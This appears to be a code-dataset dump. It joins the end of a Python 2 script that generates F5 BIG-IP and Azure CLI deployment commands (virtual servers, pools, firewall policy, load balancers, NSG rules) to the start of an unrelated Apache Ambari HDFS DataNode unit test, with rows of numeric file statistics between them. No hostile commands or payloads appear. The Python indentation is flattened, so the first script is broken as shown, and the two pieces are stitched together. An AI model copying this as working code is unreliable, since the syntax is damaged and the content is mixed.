'command': "create /ltm virtual ssl_not_visible_vs destination %s:8443 profiles replace-all-with { loose_fastL4 } pool https_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(external_vip2, LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'float_is_alive_vs',
'command': "create /ltm virtual float_is_alive_vs destination %s:80 profiles replace-all-with { http } rules { is_alive } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(str(parameters['f5_Ext_Untrusted_IP']), LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'is_alive_vs',
'command': "create /ltm virtual is_alive_vs destination %s:80 profiles replace-all-with { http } rules { virtual_is_alive } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(str(bigip_ext_ext1_ip), LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext2_pip),
'name':'is_alive_vs',
'command': "create /ltm virtual is_alive_vs destination %s:80 profiles replace-all-with { http } rules { virtual_is_alive } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(str(bigip_ext_ext2_ip), LOG_PROFILE)})
pools.append({'server': str(bigip_ext1_pip),
'name': 'bigip_ext1_ssh_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'bigip_ext1_ssh_pool',
'host': str(bigip_ext1_ip),
'name': str(bigip_ext1_ip),
'port': '22'})
pools.append({'server': str(bigip_ext1_pip),
'name': 'bigip_ext2_ssh_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'bigip_ext2_ssh_pool',
'host': str(bigip_ext2_ip),
'name': str(bigip_ext2_ip),
'port': '22'})
pools.append({'server': str(bigip_ext1_pip),
'name': 'bigip_int1_ssh_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'bigip_int1_ssh_pool',
'host': str(bigip_int1_ip),
'name': str(bigip_int1_ip),
'port': '22'})
pools.append({'server': str(bigip_ext1_pip),
'name': 'bigip_int2_ssh_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'bigip_int2_ssh_pool',
'host': str(bigip_int2_ip),
'name': str(bigip_int2_ip),
'port': '22'})
#print "create /ltm pool external_snat_pool members replace-all-with { %s:0}" %(external_vip)
if options.debug:
print "create /ltm virtual bigip1_ext1_ssh_vs destination %s:2200 profiles replace-all-with { loose_fastL4 } pool bigip_ext1_ssh_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(external_vip)
print "create /ltm virtual bigip1_ext2_ssh_vs destination %s:2201 profiles replace-all-with { loose_fastL4 } pool bigip_ext2_ssh_pool translate-address disabled translate-port disabled fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(external_vip)
print "create /ltm virtual bigip1_ext3_ssh_vs destination %s:2202 profiles replace-all-with { loose_fastL4 } pool bigip_ext3_ssh_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(external_vip)
print "create /ltm virtual bigip1_ext4_ssh_vs destination %s:2203 profiles replace-all-with { loose_fastL4 } pool bigip_ext4_ssh_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(external_vip)
# virtuals.append({'server': str(bigip_ext1_pip),
# 'name':'bigip_ext1_ssh_vs',
# 'command': "create /ltm virtual bigip1_ext1_ssh_vs destination %s:2200 profiles replace-all-with { loose_fastL4 } pool bigip_ext1_ssh_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(external_vip)})
# virtuals.append({'server': str(bigip_ext1_pip),
# 'name':'bigip_ext2_ssh_vs',
# 'command': "create /ltm virtual bigip1_ext2_ssh_vs destination %s:2201 profiles replace-all-with { loose_fastL4 } pool bigip_ext2_ssh_pool translate-address disabled translate-port disabled fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(external_vip)})
# virtuals.append({'server': str(bigip_ext1_pip),
# 'name':'bigip_int1_ssh_vs',
# 'command': "create /ltm virtual bigip1_int1_ssh_vs destination %s:2202 profiles replace-all-with { loose_fastL4 } pool bigip_int1_ssh_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(external_vip)})
# virtuals.append({'server': str(bigip_ext1_pip),
# 'name':'bigip_int2_ssh_vs',
# 'command': "create /ltm virtual bigip1_int2_ssh_vs destination %s:2203 profiles replace-all-with { loose_fastL4 } pool bigip_int2_ssh_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(external_vip)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'mgmt_outbound_vs',
'command':"create /ltm virtual mgmt_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source %s profiles replace-all-with { loose_fastL4 } ip-forward fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s } source-address-translation { type automap }" %(parameters['management_SubnetPrefix'], LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'vdms_outbound_vs',
'command':"create /ltm virtual vdms_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source %s profiles replace-all-with { loose_fastL4 } ip-forward fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s } source-address-translation { type automap }" %(parameters['vdmS_SubnetPrefix'], LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'mo_outbound_vs',
'command':"create /ltm virtual mo_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source 10.0.0.0/8 profiles replace-all-with { loose_fastL4 } ip-forward fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s } source-address-translation { type automap }" %(LOG_PROFILE) })
if options.debug:
print "create /ltm virtual mgmt_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source %s profiles replace-all-with { loose_fastL4 } ip-forward fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s } source-address-translation { type automap }" %(parameters['management_SubnetPrefix'], LOG_PROFILE)
print "create /ltm virtual vdms_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source %s profiles replace-all-with { loose_fastL4 } ip-forward fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s } source-address-translation { type automap }" %(parameters['vdmS_SubnetPrefix'], LOG_PROFILE)
if options.action == "external_setup":
if USE_OMS:
ws = loganalytics_client.workspaces.get(resource_group,'oms-logs')
keys = loganalytics_client.workspaces.get_shared_keys(resource_group,'oms-logs')
output['oms'] = [{'customer_id':ws.customer_id,
'key':keys.primary_shared_key,
'server':str(bigip_ext1_pip)}]
else:
output['oms'] = []
# output['iapps'] = [{'template_file':
# 'template_params':
# 'server':str(bigip_ext1_pip)}]
output['server1'] = str(bigip_ext1_pip)
output['server2'] = str(bigip_ext2_pip)
output['routes'] = routes
output['pools'] = pools
output['pool_members'] = pool_members
output['virtuals'] = virtuals
modules = []
modules.append({'module':'afm',
'level':'nominal',
'server':str(bigip_ext1_pip)})
modules.append({'module':'afm',
'level':'nominal',
'server':str(bigip_ext2_pip)})
output['modules'] = modules
output['irules'] = [{'name':'is_alive',
'content': "when HTTP_REQUEST {\n HTTP::respond 200 content \"OK\"\n}\n",
'server':str(bigip_ext1_pip)},
{'name':'virtual_is_alive',
'content': "when CLIENT_ACCEPTED {\n virtual float_is_alive_vs\n}\n",
'server':str(bigip_ext1_pip)}]
commands = []
commands.append({'check':'tmsh list /ltm profile fastl4 loose_fastL4',
'command':'tmsh create /ltm profile fastl4 loose_fastL4 defaults-from fastL4 loose-close enabled loose-initialization enabled idle-timeout 300 reset-on-timeout disabled',
'server':str(bigip_ext1_pip)})
commands.append({'check':'tmsh list /security log profile local-afm-log',
'command':'tmsh create /security log profile local-afm-log { network replace-all-with { local-afm-log { publisher local-db-publisher filter { log-acl-match-accept enabled log-acl-match-drop enabled log-acl-match-reject enabled } } } }',
'server':str(bigip_ext1_pip)})
commands.append({'check':'tmsh list /security firewall policy log_all_afm',
'command':'tmsh create /security firewall policy log_all_afm rules add { allow_all { action accept log yes place-before first } deny_all { action reject log yes place-after allow_all }}',
'server':str(bigip_ext1_pip)})
commands.append({'check':'tmsh list /ltm virtual-address 0.0.0.0',
'command':'create /ltm virtual-address 0.0.0.0 traffic-group none',
'server':str(bigip_ext1_pip)})
commands.append({'check':'tmsh list /ltm virtual-address %s' %(external_vip),
'command':'create /ltm virtual-address %s traffic-group none' %(external_vip),
'server':str(bigip_ext1_pip)})
commands.append({'check':'tmsh list /ltm virtual-address %s' %(external_vip2),
'command':'create /ltm virtual-address %s traffic-group none' %(external_vip2),
'server':str(bigip_ext1_pip)})
output['commands'] = commands
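    # Each entry pairs a tmsh 'check' with the 'command' to run when the check
    # finds nothing; presumably consumed downstream to apply config idempotently.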
# print json.dumps(output)
# sys.exit(0)
if options.debug:
print "\n\n### INTERNAL F5 ###"
# print "create /net self self_2nic_float address %s/%s vlan external traffic-group traffic-group-1" %(internal_vip,parameters['f5_Int_Untrusted_SubnetPrefix'].prefixlen)
print "create /ltm pool ext_gw_pool members replace-all-with { %s:0}" %(internal_ext_gw)
print "create /ltm virtual mgmt_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source %s profiles replace-all-with { loose_fastL4 } pool ext_gw_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(parameters['management_SubnetPrefix'])
print "create /ltm virtual vdms_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source %s profiles replace-all-with { loose_fastL4 } pool ext_gw_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(parameters['vdmS_SubnetPrefix'])
if options.action == "internal_setup":
output = {}
if USE_OMS:
ws = loganalytics_client.workspaces.get(resource_group,'oms-logs')
keys = loganalytics_client.workspaces.get_shared_keys(resource_group,'oms-logs')
output['oms'] = [{'customer_id':ws.customer_id,
'key':keys.primary_shared_key,
'server':str(bigip_int1_pip)}]
else:
output['oms'] = []
output['server1'] = str(bigip_int1_pip)
output['server2'] = str(bigip_int2_pip)
output['http_iapps'] = [{'logging': LOG_PROFILE,
'server':str(bigip_int1_pip)}]
virtuals = []
pools = []
pool_members = []
output['irules'] = [{'name':'is_alive',
'content': "when HTTP_REQUEST {\n HTTP::respond 200 content \"OK\"\n}\n",
'server':str(bigip_int1_pip)},
{'name':'virtual_is_alive',
'content': "when CLIENT_ACCEPTED {\n virtual float_is_alive_vs\n}\n",
'server':str(bigip_int1_pip)}]
pools.append({'server': str(bigip_int1_pip),
'name': 'ext_gw_pool',
'partition':'Common'})
pools.append({'server': str(bigip_int1_pip),
'name': 'https_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_int1_pip),
'pool': 'ext_gw_pool',
'host': str(internal_ext_gw),
'name': str(internal_ext_gw),
'port': '0'})
pool_members.append({'server': str(bigip_int1_pip),
'pool': 'https_pool',
'host': str(jumphostlinux_ip),
'name': str(jumphostlinux_ip),
'port': '443'})
virtuals.append({'server': str(bigip_int1_pip),
'name':'mgmt_outbound_vs',
'command':"create /ltm virtual mgmt_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source %s profiles replace-all-with { loose_fastL4 } pool ext_gw_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(parameters['management_SubnetPrefix'], LOG_PROFILE)})
virtuals.append({'server': str(bigip_int1_pip),
'name':'vdms_outbound_vs',
'command':"create /ltm virtual vdms_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source %s profiles replace-all-with { loose_fastL4 } pool ext_gw_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(parameters['vdmS_SubnetPrefix'], LOG_PROFILE)})
virtuals.append({'server': str(bigip_int1_pip),
'name':'mo_outbound_vs',
'command':"create /ltm virtual mo_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source 10.0.0.0/8 profiles replace-all-with { loose_fastL4 } pool ext_gw_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(LOG_PROFILE) })
virtuals.append({'server': str(bigip_int1_pip),
'name':'forward_vs',
'command':"create /ltm virtual forward_vs destination 0.0.0.0:0 mask 0.0.0.0 profiles replace-all-with { loose_fastL4 } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(LOG_PROFILE) })
# virtuals.append({'server': str(bigip_int1_pip),
# 'name':'http_vs',
# 'command':"create /ltm virtual http_vs destination %s:80 profiles replace-all-with { http serverssl } pool https_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(str(parameters['f5_Int_Untrusted_IP']), LOG_PROFILE)})
virtuals.append({'server': str(bigip_int1_pip),
'name':'float_is_alive_vs',
'command': "create /ltm virtual float_is_alive_vs destination %s:9999 profiles replace-all-with { http } rules { is_alive } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(str(parameters['f5_Int_Untrusted_IP']-1), LOG_PROFILE)})
virtuals.append({'server': str(bigip_int1_pip),
'name':'is_alive_vs',
'command': "create /ltm virtual is_alive_vs destination %s:80 profiles replace-all-with { http } rules { virtual_is_alive } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(str(bigip_ext_int1_ip), LOG_PROFILE)})
virtuals.append({'server': str(bigip_int2_pip),
'name':'is_alive_vs',
'command': "create /ltm virtual is_alive_vs destination %s:80 profiles replace-all-with { http } rules { virtual_is_alive } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(str(bigip_ext_int2_ip), LOG_PROFILE)})
# output['selfips'] = [{'name': 'self_2nic_float',
# 'address': str(internal_vip),
# 'netmask': str(parameters['f5_Int_Untrusted_SubnetPrefix'].netmask),
# 'vlan': 'external',
# 'traffic_group':'traffic-group-1',
# 'server': str(bigip_int1_pip),
# }]
output['selfips'] = []
output['pools'] = pools
output['pool_members'] = pool_members
output['virtuals'] = virtuals
routes= [
{ 'name': 'default',
'destination': 'default',
'gateway_address': str(IPAddress(parameters['f5_Int_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_int1_pip) },
{ 'name': 'exttrusted',
'destination': str(parameters['f5_Ext_Trusted_SubnetPrefix']),
'gateway_address': str(IPAddress(parameters['f5_Int_Untrusted_SubnetPrefix'].first+1)),
'server': str(bigip_int1_pip) },
{ 'name': 'private10',
'destination': '10.0.0.0/8',
'gateway_address': str(IPAddress(parameters['f5_Int_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_int1_pip) },
{ 'name': 'private172',
'destination': '172.16.0.0/12',
'gateway_address': str(IPAddress(parameters['f5_Int_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_int1_pip) }
]
output['routes'] = routes
modules = []
modules.append({'module':'afm',
'level':'nominal',
'server':str(bigip_int1_pip)})
modules.append({'module':'afm',
'level':'nominal',
'server':str(bigip_int2_pip)})
modules.append({'module':'asm',
'level':'nominal',
'server':str(bigip_int1_pip)})
modules.append({'module':'asm',
'level':'nominal',
'server':str(bigip_int2_pip)})
modules.append({'module':'apm',
'level':'nominal',
'server':str(bigip_int1_pip)})
modules.append({'module':'apm',
'level':'nominal',
'server':str(bigip_int2_pip)})
output['modules'] = modules
commands = []
commands.append({'check':'tmsh list /ltm profile fastl4 loose_fastL4',
'command':'tmsh create /ltm profile fastl4 loose_fastL4 defaults-from fastL4 loose-close enabled loose-initialization enabled idle-timeout 300 reset-on-timeout disabled',
'server':str(bigip_int1_pip)})
commands.append({'check':'tmsh list /security log profile local-afm-log',
'command':'tmsh create /security log profile local-afm-log { network replace-all-with { local-afm-log { publisher local-db-publisher filter { log-acl-match-accept enabled log-acl-match-drop enabled log-acl-match-reject enabled } } } }',
'server':str(bigip_int1_pip)})
commands.append({'check':'tmsh list /security firewall policy log_all_afm',
'command':'tmsh create /security firewall policy log_all_afm rules add { allow_all { action accept log yes place-before first } deny_all { action reject log yes place-after allow_all }}',
'server':str(bigip_int1_pip)})
commands.append({'check':'tmsh list /ltm virtual-address 0.0.0.0',
'command':'create /ltm virtual-address 0.0.0.0 traffic-group none',
'server':str(bigip_int1_pip)})
commands.append({'check':'tmsh list /ltm virtual-address %s' %(str(parameters['f5_Int_Untrusted_IP'])),
'command':'create /ltm virtual-address %s traffic-group none' %(str(parameters['f5_Int_Untrusted_IP'])),
'server':str(bigip_int1_pip)})
output['commands'] = commands
localcommands = []
localcommands.append({'check':None,
'command': "az network nic ip-config address-pool add --address-pool /subscriptions/%(subscription_id)s/resourceGroups/%(resource_group)s/providers/Microsoft.Network/loadBalancers/f5-ext-alb/backendAddressPools/loadBalancerBackEnd --ids /subscriptions/%(subscription_id)s/resourceGroups/%(resource_group)s_F5_External/providers/Microsoft.Network/networkInterfaces/%(dnsLabel)s-ext0/ipConfigurations/%(dnsLabel)s-self-ipconfig" %({'subscription_id':subscription_id, 'resource_group':resource_group, 'dnsLabel':f5_ext['dnsLabel']})
})
localcommands.append({'check':None,
'command': "az network nic ip-config address-pool add --address-pool /subscriptions/%(subscription_id)s/resourceGroups/%(resource_group)s/providers/Microsoft.Network/loadBalancers/f5-ext-alb/backendAddressPools/loadBalancerBackEnd --ids /subscriptions/%(subscription_id)s/resourceGroups/%(resource_group)s_F5_External/providers/Microsoft.Network/networkInterfaces/%(dnsLabel)s-ext1/ipConfigurations/%(dnsLabel)s-self-ipconfig" %({'subscription_id':subscription_id, 'resource_group':resource_group, 'dnsLabel':f5_ext['dnsLabel']})
})
localcommands.append({'check':None,
'command': "az network nic ip-config address-pool add --address-pool /subscriptions/%(subscription_id)s/resourceGroups/%(resource_group)s/providers/Microsoft.Network/loadBalancers/f5-int-ilb/backendAddressPools/loadBalancerBackEnd --ids /subscriptions/%(subscription_id)s/resourceGroups/%(resource_group)s_F5_Internal/providers/Microsoft.Network/networkInterfaces/%(dnsLabel)s-ext0/ipConfigurations/%(dnsLabel)s-self-ipconfig" %({'subscription_id':subscription_id, 'resource_group':resource_group, 'dnsLabel':f5_int['dnsLabel']})
})
localcommands.append({'check':None,
'command': "az network nic ip-config address-pool add --address-pool /subscriptions/%(subscription_id)s/resourceGroups/%(resource_group)s/providers/Microsoft.Network/loadBalancers/f5-int-ilb/backendAddressPools/loadBalancerBackEnd --ids /subscriptions/%(subscription_id)s/resourceGroups/%(resource_group)s_F5_Internal/providers/Microsoft.Network/networkInterfaces/%(dnsLabel)s-ext1/ipConfigurations/%(dnsLabel)s-self-ipconfig" %({'subscription_id':subscription_id, 'resource_group':resource_group, 'dnsLabel':f5_int['dnsLabel']})
})
output['localcommands'] = localcommands
# print json.dumps(output)
# sys.exit(0)
if options.debug:
print "\n\n#### Azure Infrastructure ####\n\n"
print "az network route-table update --resource-group %s --name %s --set tags.f5_tg=traffic-group-1" %(resource_group,
parameters['f5_Int_Untrust_RouteTableName'])
print "az network route-table update --resource-group %s --name %s --set tags.f5_ha=%s" %(resource_group,
parameters['f5_Int_Untrust_RouteTableName'],
f5_ext['routeTableTag'])
print "az network route-table update --resource-group %s --name %s --set tags.f5_tg=traffic-group-1" %(resource_group,
parameters['internal_Subnets_RouteTableName'])
print "az network route-table update --resource-group %s --name %s --set tags.f5_ha=%s" %(resource_group,
parameters['internal_Subnets_RouteTableName'],
f5_int['routeTableTag'])
print """\n\naz network nsg rule create --nsg-name %(dnsLabel)s-ext-nsg --resource-group %(external_rg)s --priority 1000 -n allow_http --destination-port-ranges 80 --protocol tcp
az network nsg rule create --nsg-name %(dnsLabel)s-ext-nsg --resource-group %(external_rg)s --priority 1001 -n allow_https --destination-port-ranges 443 --protocol tcp
az network nsg rule create --nsg-name %(dnsLabel)s-ext-nsg --resource-group %(external_rg)s --priority 1002 -n allow_rdp --destination-port-ranges 3389 --protocol tcp
az network nsg rule create --nsg-name %(dnsLabel)s-ext-nsg --resource-group %(external_rg)s --priority 1003 -n allow_ssh --destination-port-ranges 22 --protocol tcp
az network nsg rule create --nsg-name %(dnsLabel)s-ext-nsg --resource-group %(external_rg)s --priority 1004 -n allow_moressh --destination-port-ranges 2200-2299 --protocol tcp""" %({'external_rg':f5_ext_resource_group,
'dnsLabel':f5_ext['dnsLabel']})
parameters['resource_group'] = resource_group
print "az network lb create --resource-group %s_F5_External --public-ip-address f5-alb-ext-pip0 --frontend-ip-name loadBalancerFrontEnd0 --backend-pool-name LoadBalancerBackEnd --name f5-ext-alb" %(resource_group)
print "az network lb probe create --lb-name f5-ext-alb -g %s_F5_External --name is_alive --port 80 --protocol Http --path /" %(resource_group)
# print "az network lb address-pool create -g %s --lb-name f5-ext-alb --name LoadBalancerBackEnd" %(resource_group)
print "az network nic ip-config address-pool add --resource-group %s_F5_External --nic-name %s-ext0 --lb-name f5-ext-alb --address-pool LoadBalancerBackEnd --ip-config-name %s-self-ipconfig" %(resource_group, f5_ext['dnsLabel'],f5_ext['dnsLabel'])
print "az network nic ip-config address-pool add --resource-group %s_F5_External --nic-name %s-ext1 --lb-name f5-ext-alb --address-pool LoadBalancerBackEnd --ip-config-name %s-self-ipconfig" %(resource_group, f5_ext['dnsLabel'],f5_ext['dnsLabel'])
print "az network lb rule create --backend-port 22 --frontend-port 22 --lb-name f5-ext-alb -g %s_F5_External --name ssh_vs --protocol Tcp --backend-pool-name LoadBalancerBackEnd --floating-ip true --frontend-ip-name loadBalancerFrontEnd0 --probe-name is_alive" %(resource_group)
print "az network lb create --resource-group %s_F5_External --private-ip-address %s --subnet %s --frontend-ip-name loadBalancerFrontEnd0 --backend-pool-name LoadBalancerBackEnd --name f5-ext-ilb" %(resource_group,
str(parameters['f5_Ext_Untrusted_IP']),subnet.id)
print "az network lb probe create --lb-name f5-ext-ilb -g %s_F5_External --name is_alive --port 80 --protocol Http --path /" %(resource_group)
print "az network nic ip-config address-pool add --resource-group %s_F5_External --nic-name %s-ext0 --lb-name f5-ext-ilb --address-pool LoadBalancerBackEnd --ip-config-name %s-self-ipconfig" %(resource_group, f5_ext['dnsLabel'],f5_ext['dnsLabel'])
print "az network nic ip-config address-pool add --resource-group %s_F5_External --nic-name %s-ext1 --lb-name f5-ext-ilb --address-pool LoadBalancerBackEnd --ip-config-name %s-self-ipconfig" %(resource_group, f5_ext['dnsLabel'],f5_ext['dnsLabel'])
print "az network lb rule create --backend-port 22 --frontend-port 22 --lb-name f5-ext-ilb -g %s_F5_External --name ssh_vs --protocol Tcp --backend-pool-name LoadBalancerBackEnd --floating-ip true --frontend-ip-name loadBalancerFrontEnd0 --probe-name is_alive" %(resource_group)
print "\n\n### Route Table Assocations ###"
print "#external bigip to internal"
print "\n\naz network vnet subnet update --name %(f5_Ext_Trusted_SubnetName)s --vnet-name %(vnetName)s --resource-group %(resource_group)s --route-table %(f5_Ext_Trust_RouteTableName)s" %(parameters)
print "az network vnet subnet update --name %(ipS_Trusted_SubnetName)s --vnet-name %(vnetName)s --resource-group %(resource_group)s --route-table %(ipS_Trust_RouteTableName)s" %(parameters)
print "# from internal bigip to external"
print "az network vnet subnet update --name %(f5_Int_Untrusted_SubnetName)s --vnet-name %(vnetName)s --resource-group %(resource_group)s --route-table %(f5_Int_Untrust_RouteTableName)s" %(parameters)
print "az network vnet subnet update --name %(ipS_Untrusted_SubnetName)s --vnet-name %(vnetName)s --resource-group %(resource_group)s --route-table %(ipS_Untrust_RouteTableName)s" %(parameters)
print "az network vnet subnet update --name %(vdmS_SubnetName)s --vnet-name %(vnetName)s --resource-group %(resource_group)s --route-table %(internal_Subnets_RouteTableName)s" %(parameters)
print "az network vnet subnet update --name %(management_SubnetName)s --vnet-name %(vnetName)s --resource-group %(resource_group)s --route-table %(internal_Subnets_RouteTableName)s" %(parameters)
print "\n\n External VIP: %s %s" %(external_pip[0],external_pip[1])
print "External BIG-IP 1: %s %s" %(bigip_ext_ext1_pip,bigip_ext_ext1_ip)
print "External BIG-IP 2: %s %s\n" %(bigip_ext_ext2_pip,bigip_ext_ext2_ip)
print "Internal BIG-IP 1: %s %s" %(bigip_ext_int1_pip,bigip_ext_int1_ip)
print "Internal BIG-IP 2: %s %s" %(bigip_ext_int2_pip,bigip_ext_int2_ip)
if options.action == "external_setup":
output['route_tables'] = [
# {'resource_group':resource_group,
# 'name':parameters['f5_Int_Untrust_RouteTableName'],
# 'f5_ha':f5_ext['routeTableTag'],
# 'f5_tg':'traffic-group-1'},
{'resource_group':resource_group,
'name':parameters['ipS_Untrust_RouteTableName'],
'f5_ha':f5_ext['routeTableTag'],
'f5_tg':'traffic-group-1'}
]
output['servers'] = [{'server':str(bigip_ext1_pip)},{'server':str(bigip_ext2_pip)}]
print json.dumps(output)
if options.action == "internal_setup":
output['route_tables'] = [{'resource_group':resource_group,
'name':parameters['internal_Subnets_RouteTableName'],
'f5_ha':f5_int['routeTableTag'],
'f5_tg':'traffic-group-1'},
# {'resource_group':resource_group,
# 'name':parameters['f5_Ext_Trust_RouteTableName'],
# 'f5_ha':f5_int['routeTableTag'],
# 'f5_tg':'traffic-group-1',
# 'f5_self':'self_2nic'},
{'resource_group':resource_group,
'name':parameters['ipS_Trust_RouteTableName'],
'f5_ha':f5_int['routeTableTag'],
'f5_tg':'traffic-group-1',
'f5_self':'self_2nic'}]
output['servers'] = [{'server':str(bigip_int1_pip)},{'server':str(bigip_int2_pip)}]
print json.dumps(output)
# u'f5_Ext_Trusted_SubnetPrefix': IPNetwork('192.168.1.0/24'),
# u'f5_Ext_Untrusted_SubnetPrefix': IPNetwork('192.168.0.0/24'),
# u'f5_Int_Trusted_SubnetPrefix': IPNetwork('192.168.3.0/24'),
# u'f5_Int_Untrusted_SubnetPrefix': IPNetwork('192.168.2.0/24'),
# u'gatewaySubnetPrefix': IPNetwork('192.168.255.224/27'),
# u'management_SubnetPrefix': IPNetwork('172.16.0.0/24'),
# u'vdmS_SubnetPrefix': IPNetwork('172.16.1.0/24'),
| 57.50431
| 555
| 0.659208
| 6,656
| 53,364
| 5.039213
| 0.065805
| 0.048061
| 0.037566
| 0.043946
| 0.857488
| 0.799708
| 0.757521
| 0.724993
| 0.704094
| 0.680063
| 0
| 0.024403
| 0.208286
| 53,364
| 927
| 556
| 57.566343
| 0.769486
| 0.095889
| 0
| 0.515556
| 0
| 0.096296
| 0.454661
| 0.093689
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.004444
| 0.025185
| null | null | 0.09037
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
|
54ca0830f5c63cce041488887aef926a8107fc57
| 31,715
|
py
|
Python
|
ambari-server/src/test/python/stacks/2.0.6/HDFS/test_datanode.py
|
kennyballou/ambari
|
8985bcf11296d540a861a8634c17d6b9b1accd5a
|
[
"Apache-2.0"
] | null | null | null |
ambari-server/src/test/python/stacks/2.0.6/HDFS/test_datanode.py
|
kennyballou/ambari
|
8985bcf11296d540a861a8634c17d6b9b1accd5a
|
[
"Apache-2.0"
] | null | null | null |
ambari-server/src/test/python/stacks/2.0.6/HDFS/test_datanode.py
|
kennyballou/ambari
|
8985bcf11296d540a861a8634c17d6b9b1accd5a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from stacks.utils.RMFTestCase import *
import json
from mock.mock import MagicMock, patch
from resource_management.core import shell
from resource_management.core.exceptions import Fail
class TestDatanode(RMFTestCase):
COMMON_SERVICES_PACKAGE_DIR = "HDFS/2.1.0.2.0/package"
STACK_VERSION = "2.0.6"
def test_configure_default(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "configure",
config_file = "default.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assert_configure_default()
self.assertNoMoreResources()
def test_start_default(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "start",
config_file = "default.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assert_configure_default()
self.assertResourceCalled('Directory', '/var/run/hadoop',
owner = 'hdfs',
group = 'hadoop',
mode = 0755
)
self.assertResourceCalled('Directory', '/var/run/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
not_if='ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertResourceCalled('Execute', "ambari-sudo.sh su hdfs -l -s /bin/bash -c '[RMF_EXPORT_PLACEHOLDER]ulimit -c unlimited ; /usr/lib/hadoop/sbin/hadoop-daemon.sh --config /etc/hadoop/conf start datanode'",
environment = {'HADOOP_LIBEXEC_DIR': '/usr/lib/hadoop/libexec'},
not_if = 'ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
